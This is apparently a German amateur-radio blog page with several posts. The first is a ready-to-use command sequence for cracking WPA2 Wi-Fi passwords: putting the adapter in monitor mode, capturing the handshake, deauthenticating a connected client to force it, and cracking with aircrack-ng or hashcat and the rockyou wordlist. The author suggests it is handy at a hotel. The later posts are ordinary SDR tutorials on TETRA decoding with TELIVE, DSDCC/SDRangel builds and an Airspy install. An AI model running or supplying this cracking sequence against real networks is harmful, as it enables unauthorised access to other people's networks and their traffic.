WPA2 hacken

Das WPA2 schon längst nicht mehr sicher ist, wissen wir alle.

Heute ist mir wieder eine nette Befehlsübersicht über den Weg gelaufen, kann man ja mal gebrauchen, im Hotel oder so….:

# put your network device into monitor mode
airmon-ng start wlan0

# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0

# start listening for the handshake
airodump-ng -c 6 — bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0

# optionally deauth a connected client to force a handshake
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

########## crack password with aircrack-ng… ########### 

download 134MB rockyou.txt dictionary file if needed
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# crack w/ aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap

########## or crack password with naive-hashcat ##########

#  convert cap to hccapxcap2hc
capx.bin capture/-01.cap capture/-01.hccapx

# crack with naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh

Das Original kommt von Hakin9 und die Erklärungen dazu gibt es hier.

Tetra dekodieren ist so einfach

Viel einfacher als gedacht ist das dekodieren von Tetra, dazu benötigt man andere Software weil dsd, dsd+ und dsdcc nicht dafür geeignet sind. Ich empfehle TELIVE. Die Live Version kann ohne Installation verwendet werden. (Booten von einem fetigen USB Stick). Diese Version wurde auch schon bei rtl-sdr.com vorgestellt. Allerdings empfehle ich die neuste Version herunterzuladen, diese gibt es hier . Dann kann es auch schon los gehen, schreibt das *.img auf einen USB- Stick und bootet von diesem.

Für Linux User als root oder mit sudo:

dd if=datei.img of=/dev/sdX bs=1M status=progress

Windows User oder Terminal- Faule können z.B. Etcher benutzen

Dann könnt ihr das Image booten und es sollte dann so aussehen:

Als aller erstes, lest bitte die ReadMe das ist wichtig. Dann installiert bitte den Audio Codec. Danach öffnet bitte den Ordner TELIVE DEMO. Dieser sollte dann so aussehen:

Ihr startet bitte die Programme in folgender Reihenfolge: tetrad, dann DEMO telive, dann DEMO UDP receiver 1 und zuletzt gnuradio companion.

Wir fangen also mit tetrad an (danach könnt ihr das Fenster minimieren):

tetrad

Danach Demo telive (bitte auch erstmal wieder minimieren):

DEMO telive

Darauf DEMO UDP receiver 1, nicht wundern, es ist nur ein schwarzes Fenster, was ihr dann wieder minimieren könnt:

DEMO UDP receiver

Und als letztes startet ihr gnuradio companion:

gnuradio companion

Keine Angst, hier braucht ihr nur den Reveiver starten, entweder in dem ihr auf das “Play Symbol” drück oder mit F6.

Achtung: Im Fenster des SQ5BPF Tetra Receiver kann es sein, dass ihr den unteren Teil nicht seht, den braucht ihr aber unbedingt. Daher müsst ihr das Fenster bei halten der ALT-Taste und halten der linken Maustaste nach oben verschieben und ander unteren Fensterkante das “Fenster” nach unten aufziehen.

SQ5BPF Tetra Receiver

Hier einfach nur die Frequenz einstellen im folgenden Format 433.500 MHz wird als 433.500M “Enter” eingegeben (siehe Screenshot). Mit der Maus in die Mitte des Signales klicken. Es hilft manchmal Autoscale zu drücken aber ansonsten können sie Einstellungen zu bleiben.

Das receiver1 udp Fenster sieht jetzt so aus:

receiver 1 udp

Um das Signal richtig einzustellen, muss am SQ5BPF Tetra Receiver den Fine Tune verschieben bis man im receiver1udp das Tetra Signal dekodieren kann, das sieht dann ungefähr so aus:

Tetra Signal gefunden

Sollte jetzt gefunkt werden, hört ihr schon was.

Alle weiteren Einstellungen werden im DEMO telive Fenster (siehe oben) gemacht. Ich empfehle hier mal die Taste “t” zu drücken :).

Alle weiteren Einstellungen und Funktionen entnehmt bitte der offiziellen Dokumentation: https://github.com/sq5bpf/telive/raw/master/telive_doc.pdf

Das war es schon, ist doch easy oder?

TELIVE gibt es auch für Windows

TELIVE Github Seite

DSDCC Installation und integration in SDRANGEL

Update 28.01.2019: DSDCC Kompilierung angepasst, Link: SDRANGEL Instruction hinzugefügt.

Wer vor dem 28.01.2019 eine Installation gemacht hat und es nicht hinbekommen hat, löscht bite das sdrangel github Verzeichnis und macht ein neues:

git clone https://github.com/f4exb/sdrangel.git

cd sdrangel

mkdir build && cd build

cmake .. -DDSDCC_DIR=/usr/local/bin/dsdccx

make && sudo make install

Alle anderen können hier starten:

DSDCC ist eine Weiterentwicklung des beliebten DSD- Tool zur Dekodierung digitaler unverschlüsselter Signale. Mit folgenden Schritten, habe ich auf einem Ubuntu Mate (18.04. LTS), SDRANGEL mit DSDCC problemlos installiert bekommen.

Fangen wir an, die für DSDCC erforderliche Tools herunterzuladen und zu kompilieren:

MBElib:

git clone https://github.com/szechyjs/mbelib.git
cd mbelib/
mkdir build && cd build
cmake ..
make
sudo make install
cd ~

serialDV:

git clone https://github.com/f4exb/serialDV.git
cd serialDV/
mkdir build && cd build
cmake ..
make
sudo make install
cd ~

Und nun das eigentliche Programm DSDCC

git clone https://github.com/f4exb/dsdcc.git
cd dsdcc/
mkdir build && cd build
cmake -DUSE_MBELIB=ON ..
Edit the CMakeCache.txt in the build directory to reflect:
LIBSERIALDV_INCLUDE_DIR:PATH=/usr/local/include/serialdv
LIBSERIALDV_LIBRARY:FILEPATH=/usr/local/lib/libserialdv.so

make
sudo make install

Um das DSDCC Plugin zu aktivieren, muss SDR Angel neu kompiliert werden. Mit folgenden “Schalter” (Update 28.01.2019):

cd sdrangel && cd build (das Verzeichnis wo sdrangel kompiliert wurde)
cmake .. -DDSDCC_DIR=/usr/local/bin/dsdccx

make && sudo make install

Danach kann SDRAngel gestartet werden.

Fertig.

Weitere Links zum Thema:

https://github.com/f4exb/sdrangel/blob/master/plugins/channelrx/demoddsd/readme.md

https://github.com/f4exb/sdrangel/wiki/Compile-from-source-in-Linux#build-sdrangel

https://www.qsl.net/kb9mwr/projects/dv/pi-rtl-dsd-experiments.pdf

https://github.com/f4exb/dsdcc

https://github.com/f4exb/sdrangel


How to install SDRANGEL on Ubuntu Mate 18/04

Update: If you like to choose the DSDCC Plugin, you must compile the sdrangel Software like (see my next Blogpost for DSDCC) :


First download and compile sdrangel like here: https://github.com/f4exb/sdrangel#with-newer-versions-just-do

After you compile the software, you becomes an failure that the libsdrgui.so is missing. No panic …

Copy the libsdrgui.so from /usr/local/lib/libsdrgui.so to /lib/x86_64-linux-gnu/libsdrgui.so:

sudo cp /usr/local/lib/libsdrgui.so /lib/x86_64-linux-gnu/libsdrgui.so

or the better way:

sudo ln -s /usr/local/lib/libsdrgui.so /lib/x86_64-linux-gnu/libsdrgui.so

After you copy the libsdrgui.so you must install the liblogging libary:

sudo apt install liblogging-stdlog0

Thats all, happy RXing and best 73 de

Jens DG7ABL

Airspy Mini unter Fedora 28 installieren

Um Airspy unter Fedora 28 zum laufen zu bekommen sind einige Schritte notwendig:

dnf install libusb pkg-config gcc-c++ libusb-devel.x86_64 mingw64-libusbx.noarch mingw64-libusbx-static.noarch
wget https://github.com/airspy/airspyone_host/archive/master.zip
unzip master.zip
cd airspyone_host-master/
mkdir build
cd build/
cmake ../ -DINSTALL_UDEV_RULES=ON
make
make install
ldconfig
cp /usr/local/lib/* /usr/local/lib64
airspy_info

 

Jetzt sollte folgende Ausgabe kommen, wenn Ihr “airspy_info” eingebt:

airspy_lib_version: 1.0.9
Found AirSpy board 1
Board ID Number: 0 (AIRSPY)
Firmware Version: AirSpy MINI v1.0.0-rc9-0-ga56adfd 2016-06-12
Part ID Number: 0x6906002B 0x00000030
Serial Number: 0x04B46VC835348D0B
Supported sample rates:
6.000000 MSPS
3.000000 MSPS
Close board 1

 

Am Ende könnt ihr euch GQRX herunterladen (voher die Datei mit chmod +x ausführbar machen)

Dann sollte der Airspy angezeigt werden und ihr könnt loslegen.